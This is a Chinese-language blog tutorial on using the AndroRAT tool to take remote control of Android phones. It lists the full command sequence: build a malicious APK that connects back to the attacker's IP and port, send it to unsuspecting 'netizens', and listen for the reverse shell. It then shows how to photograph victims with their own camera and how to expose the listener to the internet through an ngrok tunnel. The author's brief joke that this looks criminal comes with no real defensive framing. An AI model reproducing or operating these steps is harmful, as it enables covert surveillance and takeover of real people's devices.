如何远程控制任意安卓设备2.0(androRAT)

相关阅读

之前分享过很多期有关远程控制的相关教程,今天我们再补充一期,本质上原理还是Reverse Shell(反弹shell)

视频教程

相关命令

首先下载androRAT github项目

git clone https://github.com/karma9874/AndroRAT.git

然后进入AndroRAT目录

cd AndroRAT

安装Python依赖

pip install -r requirements.txt

生成名为fancypig.apk的恶意apk文件

后面要跟上你的kali linux的IP地址192.168.x.x以及对应的端口号,视频中是4444,我们这里默认是8000

python androRAT.py --build -i 192.169.x.x -p 8000 -o fancypig.apk

然后,你需要进行投递,让热心网友打开,需要默认授权全部权限

同时,你还要开启监听端口

python androRAT.py --shell -i 0.0.0.0 -p 8000

如果热心网友成功打开了,你可以输入help来获取相关远程控制的命令,例如,我们可以使用摄像头

camlist

然后选择后置摄像头(0)或者前置摄像头(1),视频中选用的是后置摄像头

takepic 0

然后你就可以进入AndroRAT/Dumps路径下,找到摄像头拍的照片了

图片[1]-如何远程控制任意安卓设备2.0(androRAT)-FancyPig's blog

这看起来就很刑啊……

这里不建议大家部署到公网上,当然你非要向亲密的朋友炫技的话,我们这里也给大家了一个思路,其实就是通过ngrok代理服务,让你的网页快速上线,同时建立连接,这个其实我们在之前的视频里也用到过

我们可以先运行下面的命令,获取ngrok的tcp节点

./ngrok
图片[2]-如何远程控制任意安卓设备2.0(androRAT)-FancyPig's blog

然后打包的时候,用-i指向你的[ngrok节点],视频中是2.tcp.ngrok.io,你需要填写自己对应的,同时要填写端口信息

python androRAT.py --build -i [ngrok节点] -p [端口] -o fancypig.apk

打包好fancypig.apk文件后发送给热心网友,监听反弹shell的手段和上面完全一致,视频中是4444端口,我们这里用默认的8000,这个你可以自定义,只要前后一致就行了

python androRAT.py --shell -i 0.0.0.0 -p 8000

然后就大功告成了!

© 版权声明
THE END
喜欢就支持一下吧
点赞34赞赏 分享
评论 共31条

请登录后发表评论